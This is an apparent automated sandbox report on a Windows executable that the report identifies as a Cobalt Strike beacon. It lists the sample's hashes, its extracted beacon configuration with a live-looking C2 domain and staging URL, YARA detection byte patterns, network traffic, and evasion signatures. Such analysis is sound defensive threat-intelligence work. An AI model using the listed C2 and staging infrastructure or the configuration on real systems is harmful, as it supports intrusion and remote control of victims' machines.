Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SO2mdwWVvg.exe

Overview

General Information

Sample name:SO2mdwWVvg.exe
renamed because original name is a hash value
Original sample name:f3b2f1ec49bf6fbd4fe9e28fb28e526da4c7fce85ac95f835d3dc343b872075d.exe
Analysis ID:1535738
MD5:bfa844f0be57643e3ebf11690e539a75
SHA1:8495fd0110b642c66f49e3d30c543f5c730bc206
SHA256:f3b2f1ec49bf6fbd4fe9e28fb28e526da4c7fce85ac95f835d3dc343b872075d
Tags:exeimg-bilibili-buzzuser-JAMESWT_MHT
Infos:

Detection

CobaltStrike
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Detected potential crypto function
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SO2mdwWVvg.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\SO2mdwWVvg.exe" MD5: BFA844F0BE57643E3EBF11690E539A75)
    • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTPS"], "Port": 2096, "SleepTime": 45000, "MaxGetSize": 1403644, "Jitter": 37, "MaxDNS": "Not Found", "C2Server": "img.bilibili.buzz,/jquery-3.3.1.min.js", "UserAgent": "Not Found", "HttpPostUri": "Not Found", "Malleable_C2_Instructions": "Not Found", "HttpGet_Metadata": "Not Found", "HttpPost_Metadata": "Not Found", "PipeName": "Not Found", "DNS_Idle": "Not Found", "DNS_Sleep": "Not Found", "SSH_Host": "Not Found", "SSH_Port": "Not Found", "SSH_Username": "Not Found", "SSH_Password_Plaintext": "Not Found", "SSH_Password_Pubkey": "Not Found", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Config": "Not Found", "Proxy_User": "Not Found", "Proxy_Password": "Not Found", "Proxy_Behavior": "Not Found", "Watermark": 100000000, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": "Not Found", "bProcInject_StartRWX": "Not Found", "bProcInject_UseRWX": "Not Found", "bProcInject_MinAllocSize": "Not Found", "ProcInject_PrependAppend_x86": "Not Found", "ProcInject_PrependAppend_x64": "Not Found", "ProcInject_Execute": "Not Found", "ProcInject_AllocationMethod": "Not Found", "bUsesCookies": "Not Found", "HostHeader": "Not Found"}
SourceRuleDescriptionAuthorStrings
00000000.00000003.1770728678.000001DDE5E00000.00000010.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
    00000000.00000003.1770728678.000001DDE5E00000.00000010.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
    • 0x164e3:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
    • 0x17774:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
    00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
      • 0x187e4:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
      00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_b54b94acRule for beacon sleep obfuscation routineunknown
      • 0xfd75:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
      • 0xff0d:$a_x64: 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03
      Click to see the 3 entries
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000000.00000003.1770728678.000001DDE5E00000.00000010.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 2096, "SleepTime": 45000, "MaxGetSize": 1403644, "Jitter": 37, "MaxDNS": "Not Found", "C2Server": "img.bilibili.buzz,/jquery-3.3.1.min.js", "UserAgent": "Not Found", "HttpPostUri": "Not Found", "Malleable_C2_Instructions": "Not Found", "HttpGet_Metadata": "Not Found", "HttpPost_Metadata": "Not Found", "PipeName": "Not Found", "DNS_Idle": "Not Found", "DNS_Sleep": "Not Found", "SSH_Host": "Not Found", "SSH_Port": "Not Found", "SSH_Username": "Not Found", "SSH_Password_Plaintext": "Not Found", "SSH_Password_Pubkey": "Not Found", "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Config": "Not Found", "Proxy_User": "Not Found", "Proxy_Password": "Not Found", "Proxy_Behavior": "Not Found", "Watermark": 100000000, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": "Not Found", "bProcInject_StartRWX": "Not Found", "bProcInject_UseRWX": "Not Found", "bProcInject_MinAllocSize": "Not Found", "ProcInject_PrependAppend_x86": "Not Found", "ProcInject_PrependAppend_x64": "Not Found", "ProcInject_Execute": "Not Found", "ProcInject_AllocationMethod": "Not Found", "bUsesCookies": "Not Found", "HostHeader": "Not Found"}
      Source: SO2mdwWVvg.exeReversingLabs: Detection: 36%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 80.6% probability
      Source: SO2mdwWVvg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

      Networking

      barindex
      Source: Malware configuration extractorURLs: img.bilibili.buzz
      Source: global trafficHTTP traffic detected: GET /Shorts/index.jpg HTTP/1.1accept: */*host: intl-web-1305970982.cos.ap-singapore.myqcloud.com
      Source: Joe Sandbox ViewIP Address: 43.152.64.207 43.152.64.207
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /Shorts/index.jpg HTTP/1.1accept: */*host: intl-web-1305970982.cos.ap-singapore.myqcloud.com
      Source: global trafficDNS traffic detected: DNS query: intl-web-1305970982.cos.ap-singapore.myqcloud.com
      Source: global trafficDNS traffic detected: DNS query: img.bilibili.buzz
      Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
      Source: SO2mdwWVvg.exe, 00000000.00000003.1771402299.000001DDE5EB0000.00000004.00000020.00020000.00000000.sdmp, SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5F05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.jquery.com/
      Source: SO2mdwWVvg.exeString found in binary or memory: http://intl-web-1305970982.cos.ap-singapore.myqcloud.com/Shorts/index.jpg
      Source: SO2mdwWVvg.exe, 00000000.00000003.1770340224.000001DDE5E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://intl-web-1305970982.cos.ap-singapore.myqcloud.com/Shorts/index.jpg(S
      Source: SO2mdwWVvg.exe, 00000000.00000003.1770340224.000001DDE5E9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://intl-web-1305970982.cos.ap-singapore.myqcloud.com/Shorts/index.jpgvR
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmp, SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5F05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz/
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz/i
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmp, SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5E9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5E9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/3r9
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5E9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/Cri
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/J
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/jquery-3.3.1.min.js
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/jquery-3.3.1.min.js/
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/jquery-3.3.1.min.js011b87bd06T-
      Source: SO2mdwWVvg.exe, 00000000.00000002.3567085298.000001DDE5F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/jquery-3.3.1.min.js1A
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/jquery-3.3.1.min.js9
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/jquery-3.3.1.min.js=
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/jquery-3.3.1.min.jsI
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/jquery-3.3.1.min.jsM
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/jquery-3.3.1.min.jsraphy
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5ED9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/jquery-3.3.1.min.jsu
      Source: SO2mdwWVvg.exe, 00000000.00000002.3567085298.000001DDE5F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/jquery-3.3.1.min.jsy
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/m
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/m32
      Source: SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.bilibili.buzz:2096/w

      System Summary

      barindex
      Source: 00000000.00000003.1770728678.000001DDE5E00000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
      Source: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
      Source: 00000000.00000002.3566662494.000001DDE5F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE60FFC3E0_2_000001DDE60FFC3E
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE60FFDD60_2_000001DDE60FFDD6
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE610D3840_2_000001DDE610D384
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE610C8880_2_000001DDE610C888
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE61180B00_2_000001DDE61180B0
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE610C11C0_2_000001DDE610C11C
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE610A7080_2_000001DDE610A708
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE61177400_2_000001DDE6117740
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE61048200_2_000001DDE6104820
      Source: SO2mdwWVvg.exeStatic PE information: invalid certificate
      Source: SO2mdwWVvg.exeStatic PE information: Number of sections : 22 > 10
      Source: SO2mdwWVvg.exeBinary or memory string: OriginalFilename vs SO2mdwWVvg.exe
      Source: SO2mdwWVvg.exe, 00000000.00000000.1699484601.00007FF63F8E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemsedge.exe8 vs SO2mdwWVvg.exe
      Source: SO2mdwWVvg.exeBinary or memory string: OriginalFilenamemsedge.exe8 vs SO2mdwWVvg.exe
      Source: 00000000.00000003.1770728678.000001DDE5E00000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
      Source: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
      Source: 00000000.00000002.3566662494.000001DDE5F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
      Source: SO2mdwWVvg.exeBinary string: AfdPollInfo\Device\Afd\Mio
      Source: SO2mdwWVvg.exeBinary string: Failed to open \Device\Afd\Mio:
      Source: classification engineClassification label: mal84.troj.evad.winEXE@2/0@8/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
      Source: SO2mdwWVvg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: SO2mdwWVvg.exeReversingLabs: Detection: 36%
      Source: SO2mdwWVvg.exeString found in binary or memory: /load_hpack; header malformed -- pseudo not at head of block
      Source: unknownProcess created: C:\Users\user\Desktop\SO2mdwWVvg.exe "C:\Users\user\Desktop\SO2mdwWVvg.exe"
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: SO2mdwWVvg.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: SO2mdwWVvg.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: SO2mdwWVvg.exeStatic file information: File size 8063016 > 1048576
      Source: SO2mdwWVvg.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x29f200
      Source: SO2mdwWVvg.exeStatic PE information: Raw size of /86 is bigger than: 0x100000 < 0x151200
      Source: SO2mdwWVvg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
      Source: SO2mdwWVvg.exeStatic PE information: real checksum: 0x952f02 should be: 0x7b6c97
      Source: SO2mdwWVvg.exeStatic PE information: section name: .xdata
      Source: SO2mdwWVvg.exeStatic PE information: section name: /4
      Source: SO2mdwWVvg.exeStatic PE information: section name: /19
      Source: SO2mdwWVvg.exeStatic PE information: section name: /35
      Source: SO2mdwWVvg.exeStatic PE information: section name: /47
      Source: SO2mdwWVvg.exeStatic PE information: section name: /61
      Source: SO2mdwWVvg.exeStatic PE information: section name: /73
      Source: SO2mdwWVvg.exeStatic PE information: section name: /86
      Source: SO2mdwWVvg.exeStatic PE information: section name: /97
      Source: SO2mdwWVvg.exeStatic PE information: section name: /113
      Source: SO2mdwWVvg.exeStatic PE information: section name: /127
      Source: SO2mdwWVvg.exeStatic PE information: section name: /143
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E04C06 push esi; ret 0_3_000001DDE5E04C0F
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E003A0 push ebx; ret 0_3_000001DDE5E003A6
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E072F1 push esp; ret 0_3_000001DDE5E07322
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E05AF5 push edx; ret 0_3_000001DDE5E05ABE
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E072CE push ebx; ret 0_3_000001DDE5E072EE
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E04ACF push esp; ret 0_3_000001DDE5E04AD8
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E06265 push ebp; ret 0_3_000001DDE5E06269
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E05E20 push ecx; ret 0_3_000001DDE5E05E33
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E0849E push ebp; ret 0_3_000001DDE5E084A5
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E04486 push edx; ret 0_3_000001DDE5E0449E
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E0846F push es; ret 0_3_000001DDE5E08476
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E057C9 push eax; ret 0_3_000001DDE5E057AA
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E0678C push ebx; ret 0_3_000001DDE5E0679A
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E0579B push eax; ret 0_3_000001DDE5E057AA
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E0672C push ebx; ret 0_3_000001DDE5E0679A
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E0416D push esi; ret 0_3_000001DDE5E04172
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_3_000001DDE5E07900 push ecx; ret 0_3_000001DDE5E0791E
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE60FAD58 push ebp; iretd 0_2_000001DDE60FAD59
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE6106A40 push cs; ret 0_2_000001DDE6106A4B
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE60F935D push edi; iretd 0_2_000001DDE60F935E
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE6115BBB push ebp; iretd 0_2_000001DDE6115BBC
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE6115BDB push ebp; iretd 0_2_000001DDE6115BDC
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE6115C04 push ebp; iretd 0_2_000001DDE6115C05
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE60F971E push cs; retf 0_2_000001DDE60F971F
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exe TID: 7636Thread sleep time: -34780s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exe TID: 7636Thread sleep time: -40597s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exe TID: 7636Thread sleep time: -36804s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exe TID: 7636Thread sleep time: -31355s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeThread delayed: delay time: 34780Jump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeThread delayed: delay time: 40597Jump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeThread delayed: delay time: 36804Jump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeThread delayed: delay time: 31355Jump to behavior
      Source: SO2mdwWVvg.exe, 00000000.00000003.1770093925.000001DDE5EAE000.00000004.00000020.00020000.00000000.sdmp, SO2mdwWVvg.exe, 00000000.00000003.1771402299.000001DDE5EB0000.00000004.00000020.00020000.00000000.sdmp, SO2mdwWVvg.exe, 00000000.00000003.1769895816.000001DDE5EAD000.00000004.00000020.00020000.00000000.sdmp, SO2mdwWVvg.exe, 00000000.00000002.3566662494.000001DDE5E9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeNtDeviceIoControlFile: Indirect: 0x7FF63F6B75BEJump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeNtCreateFile: Indirect: 0x7FF63F6BE714Jump to behavior
      Source: C:\Users\user\Desktop\SO2mdwWVvg.exeCode function: 0_2_000001DDE6102FA8 GetUserNameA,strrchr,_snprintf,0_2_000001DDE6102FA8
